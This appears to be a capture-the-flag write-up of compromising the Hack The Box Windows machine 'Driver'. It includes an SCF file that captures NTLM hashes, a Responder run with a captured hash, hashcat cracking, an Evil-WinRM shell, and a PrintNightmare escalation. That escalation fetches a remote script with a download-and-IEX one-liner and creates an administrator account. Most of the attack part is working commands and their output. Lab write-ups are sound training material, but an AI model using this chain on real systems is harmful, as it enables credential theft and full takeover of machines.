Driver

Driver is Windows box which introduces common vulnerability/configuration that may be exploited by attackers. In particular it’s about SCF file

Enumeration

NMAP

Nmap scan report for 10.10.11.106
Host is up (0.048s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2021-12-27T03:51:27
|_  start_date: 2021-12-27T00:53:05
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 7h02m15s, deviation: 0s, median: 7h02m14s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.43 seconds

WebPage on Port 80

So apparently, the user’s username is admin, so let’s try with password admin…. And we’re in We do have an upload option, so let’s check that Checking the source confirms that

Exploitation

Weaponize the Payload

luka@kali:~/htb/driver$ cat share.scf
[Shell]
Command=2
IconFile=\\10.10.14.18\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

Start Responder

sudo responder -I tun1

tony::DRIVER:9f5260851ec10f7a:6890F0436DABE3FD3939522E624EF1AD:0101000000000000000243F1A4FAD7013E503849182A52FF0000000002000800450039003400410001001E00570049004E002D00560047005A003300440050005800320048005A00570004003400570049004E002D00560047005A003300440050005800320048005A0057002E0045003900340041002E004C004F00430041004C000300140045003900340041002E004C004F00430041004C000500140045003900340041002E004C004F00430041004C0007000800000243F1A4FAD70106000400020000000800300030000000000000000000000000200000B6FE67041FC0497A7ACBB33D27DDED29E05FBEC39AB03DF4B0143F77C15A82070A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003800000000000000000000000000

Crack the Hash

Using netcat

.\hashcat.exe -m 5600 -a 0 hash.txt .\rockyou.txt --force

WinRM to the box

luka@kali:~$ /home/luka/tools/evil-winrm/evil-winrm.rb -u tony -p liltony -i 10.10.11.106

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

Privilege Escalation

Great help was this site: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

PrintNightmare Enumeration

Let’s check 2 things: RPC and SMB access using tony’s user.

luka@kali:~/htb/driver$ rpcclient -U 'tony%liltony' 10.10.11.106                     rpcclient $> 

So RPC - Check! SMB?

luka@kali:~/htb/driver$ smbmap -H 10.10.11.106 -u tony -p liltony
[+] IP: 10.10.11.106:445        Name: 10.10.11.106                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

… Check. We do have SMB access with tony/liltony

RCP can be checked with rpccheck.py as well

luka@kali:~$ rpcdump.py @10.10.11.106 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol

PrintNightmare Exploitation

Invoke-Nightmare

(new-object system.net.webclient).downloadstring('http://10.10.14.18/Invoke-Nightmare.ps1') | IEX

Use Invoke-Nightmare to create user which will be added to Administrators group

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -NewUser "luka" -NewPassword "Password01!"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user luka as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

So you can see, there i am - my user as Admin

*Evil-WinRM* PS C:\Users\tony\Documents> net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
luka
The command completed successfully.

So that’s it - we can login using our new user and grab a flag.